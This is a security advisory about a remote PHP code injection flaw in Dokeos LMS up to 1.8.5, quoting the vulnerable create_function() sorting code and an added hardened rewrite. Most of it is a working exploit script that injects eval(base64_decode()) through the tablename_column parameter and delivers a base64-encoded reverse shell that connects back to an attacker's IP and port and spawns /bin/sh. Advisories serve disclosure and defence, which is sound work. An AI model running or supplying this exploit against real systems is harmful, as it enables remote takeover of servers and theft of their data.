Dokeos whoisonline.php Remote PHP Code Execution Vulnerability

Published: 2009-04-21
Updated: 2009-04-23

Affected systems:
Dokeos e-learning Dokeos 1.5.* - 1.8.5
Description:
BUGTRAQ ID: 34633

Dokeos is an open-source online education and course management system.

Dokeos does not filter the input passed in the tablename_column parameter of whoisonline.php before using it in a create_function() call in main/inc/lib/tablesort.lib.php. The parameter is concatenated, unescaped, into the PHP source text of the comparator, so a remote attacker can inject and execute arbitrary PHP code by submitting a crafted request. The vulnerable code segment in /main/inc/lib/tablesort.lib.php follows:

    function sort_table($data, $column = 0, $direction = SORT_ASC, $type = SORT_REGULAR)
    {
        if(!is_array($data) or count($data)==0){return array();}
        switch ($type)
        {
            case SORT_REGULAR :
                if (TableSort::is_image_column($data, $column))
                {
                    return TableSort::sort_table($data, $column, $direction, SORT_IMAGE);
                }
                elseif (TableSort::is_date_column($data, $column))
                {
                    return TableSort::sort_table($data, $column, $direction, SORT_DATE);
                }
                elseif (TableSort::is_numeric_column($data, $column))
                {
                    return TableSort::sort_table($data, $column, $direction, SORT_NUMERIC);
                }
                return TableSort::sort_table($data, $column, $direction, SORT_STRING);
                break;
            case SORT_NUMERIC :
                $compare_function = 'strip_tags($el1) > strip_tags($el2)';
                break;
            case SORT_STRING :
                $compare_function = 'strnatcmp(TableSort::orderingstring(strip_tags($el1)), [...]
                break;
            case SORT_IMAGE :
                $compare_function = 'strnatcmp(TableSort::orderingstring(strip_tags($el1,"<img>")), [...]
                break;
            case SORT_DATE :
                $compare_function = 'strtotime(strip_tags($el1)) > strtotime(strip_tags($el2))';
        }
        // $column (request-controlled) and $direction are interpolated as raw PHP source text
        $function_body = '$el1 = $a['.$column.']; $el2 = $b['.$column.']; return ('.$direction.' == SORT_ASC [...]
        // Sort the content: create_function() compiles the string above as code
        usort($data, create_function('$a,$b', $function_body));
        return $data;
    }
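As an added illustration (not Dokeos code) of how the same sort can be written without building PHP source from request data: the column index is validated as an integer and captured by a closure, so it is only ever used as data. The class name SafeTableSort, the sample rows and the numeric value given to SORT_DATE are assumptions.

```php
<?php
// Added example, not Dokeos code: a hardened stand-in for TableSort::sort_table().
// The column index is validated and captured by a closure as data, so no request
// value is ever turned into PHP source text the way create_function() does.
// SORT_DATE is Dokeos-specific; the value used here is an assumption.
if (!defined('SORT_DATE')) { define('SORT_DATE', 1000); }

class SafeTableSort
{
    public static function sort_table($data, $column = 0, $direction = SORT_ASC, $type = SORT_STRING)
    {
        if (!is_array($data) || count($data) == 0) { return array(); }
        // Whitelist: only a non-negative integer index that exists in every row is accepted.
        if (!preg_match('/^\d+$/', (string) $column)) {
            throw new InvalidArgumentException('column must be a non-negative integer');
        }
        $column = (int) $column;
        foreach ($data as $row) {
            if (!is_array($row) || !array_key_exists($column, $row)) {
                throw new InvalidArgumentException("column $column missing from a row");
            }
        }
        $asc = ($direction == SORT_ASC);
        $ord = function ($x, $y) { return ($x == $y) ? 0 : (($x < $y) ? -1 : 1); };
        switch ($type) {
            case SORT_NUMERIC:
                $cmp = function ($x, $y) use ($ord) { return $ord((float) strip_tags($x), (float) strip_tags($y)); };
                break;
            case SORT_DATE:
                $cmp = function ($x, $y) use ($ord) { return $ord(strtotime(strip_tags($x)), strtotime(strip_tags($y))); };
                break;
            default: // SORT_STRING and anything unknown: natural string order
                $cmp = function ($x, $y) { return strnatcmp(strip_tags($x), strip_tags($y)); };
        }
        usort($data, function ($a, $b) use ($column, $cmp, $asc) {
            $r = $cmp($a[$column], $b[$column]);
            return $asc ? $r : -$r;
        });
        return $data;
    }
}

// Constructed sample rows (user, last seen); SafeTableSort is an assumed class name.
$rows = array(array('carol', '2009-04-23'), array('alice', '2009-04-21'), array('bob', '2009-04-22'));
print_r(SafeTableSort::sort_table($rows, 1, SORT_DESC, SORT_DATE));
try {
    SafeTableSort::sort_table($rows, '1]; /* not an index */', SORT_ASC);
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
```

A non-numeric column value is rejected before usort() is reached, which is the check the original code lacks.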

<*Source: EgiX (n0b0d13s@gmail.com

  Link: http://secunia.com/advisories/34855/
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear the risk themselves!

<?php

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
    if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
      die("\nsocket_create(): " . socket_strerror(socket_last_error()) . "\n");

    if (socket_connect($s, $host, 80) == false)
      die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");

    socket_write($s, $packet, strlen($packet));
    $response = '';
    while ($m = socket_read($s, 2048)) $response .= $m;

    socket_close($s);
    return $response;
}

print "\n+--------------------------------------------------------------------+";
print "\n| Dokeos LMS <= 1.8.5 (reverse shell) Code Injection Exploit by EgiX |";
print "\n+--------------------------------------------------------------------+\n\n";

if ($argc < 4)
{
    print "\nUsage......: php $argv[0] <host> <path> <local IP> [port]\n";
    print "\nExample....: php $argv[0] localhost /dokeos/ 192.168.0.2";
    print "\nExample....: php $argv[0] localhost / 192.168.0.2 12345\n";
    die();
}

$host = $argv[1];
$path = $argv[2];
$ip   = $argv[3];
$port = isset($argv[4]) ? (int)$argv[4] : 4444;

// reverse shell based on http://pentestmonkey.net/tools/php-reverse-shell/
$code =
"c2V0X3RpbWVfbGltaXQoMCk7CmluaV9zZXQoJ2RlZmF1bHRfc29ja2V0X3RpbWVvdXQnLCA1KTsKC" .
"iRpcCA9ICRfU0VSVkVSW0hUVFBfSVBdOwokcG9ydCA9ICRfU0VSVkVSW0hUVFBfUE9SVF07CiRjaH" .
"Vua19zaXplID0gMjA0ODsKCmlmICghKCRzb2NrID0gZnNvY2tvcGVuKCRpcCwgJHBvcnQpKSkgZGl" .
"lKCdbZXJyXUNvbm5lY3Rpb24gdG8geyRpcH06eyRwb3J0fSByZWZ1c2VkJyk7CiRkZXNjcmlwdG9y" .
"c3BlYyA9IGFycmF5KDAgPT4gYXJyYXkoJ3BpcGUnLCAncicpLCAxID0+IGFycmF5KCdwaXBlJywgJ" .
"3cnKSwgMiA9PiBhcnJheSgncGlwZScsICd3JykpOwppZiAoIWlzX3Jlc291cmNlKCgkcHJvY2Vzcy" .
"A9IHByb2Nfb3BlbignL2Jpbi9zaCAtaScsICRkZXNjcmlwdG9yc3BlYywgJHBpcGVzKSkpKSBkaWU" .
"oJ1tlcnJdQ2FuXCd0IHNwYXduIHNoZWxsJyk7CgpzdHJlYW1fc2V0X2Jsb2NraW5nKCRwaXBlc1sw" .
"XSwgMCk7CnN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzFdLCAwKTsKc3RyZWFtX3NldF9ibG9ja" .
"2luZygkcGlwZXNbMl0sIDApOwpzdHJlYW1fc2V0X2Jsb2NraW5nKCRzb2NrLCAwKTsKCndoaWxlIC" .
"ghZmVvZigkc29jaykgJiYgIWZlb2YoJHBpcGVzWzFdKSkgewoJJHJlYWRfYSA9IGFycmF5KCRzb2N" .
"rLCAkcGlwZXNbMV0sICRwaXBlc1syXSk7CgkkbnVtX2NoYW5nZWRfc29ja2V0cyA9IHN0cmVhbV9z" .
"ZWxlY3QoJHJlYWRfYSwgJHdyaXRlX2EsICRlcnJvcl9hLCBudWxsKTsKCglpZiAoaW5fYXJyYXkoJ" .
"HNvY2ssICRyZWFkX2EpKSB7CgkJJGlucHV0ID0gZnJlYWQoJHNvY2ssICRjaHVua19zaXplKTsKCQ" .
"lmd3JpdGUoJHBpcGVzWzBdLCAkaW5wdXQpOwoJfQoJaWYgKGluX2FycmF5KCRwaXBlc1sxXSwgJHJ" .
"lYWRfYSkpIHsKCQkkaW5wdXQgPSBmcmVhZCgkcGlwZXNbMV0sICRjaHVua19zaXplKTsKCQlmd3Jp" .
"dGUoJHNvY2ssICRpbnB1dCk7Cgl9CglpZiAoaW5fYXJyYXkoJHBpcGVzWzJdLCAkcmVhZF9hKSkge" .
"woJCSRpbnB1dCA9IGZyZWFkKCRwaXBlc1syXSwgJGNodW5rX3NpemUpOwoJCWZ3cml0ZSgkc29jay" .
"wgJGlucHV0KTsKCX0KfQoKZmNsb3NlKCRzb2NrKTsKZmNsb3NlKCRwaXBlc1swXSk7CmZjbG9zZSg" .
"kcGlwZXNbMV0pOwpmY2xvc2UoJHBpcGVzWzJdKTsKcHJvY19jbG9zZSgkcHJvY2Vzcyk7CmRpZTsK";

$packet  = "GET {$path}whoisonline.php?tablename_column=0];}eval(base64_decode(\$_SERVER[HTTP_CODE]));%23 HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Code: {$code}\r\n";
$packet .= "IP: {$ip}\r\n";
$packet .= "Port: {$port}\r\n";
$packet .= "Connection: close\r\n\r\n";

$response = http_send($host, $packet);

if (preg_match("/\[err\](.*)/", $response, $match)) die("[-] Exploit failed ({$match[1]})\n");
if (preg_match("/<\/html>/", $response)) die("[-] Exploit failed (No users online)\n");

?>

Recommendation:
Vendor patch:

Dokeos e-learning
-----------------
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's home page for the latest version:

http://www.dokeos.com/

This advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.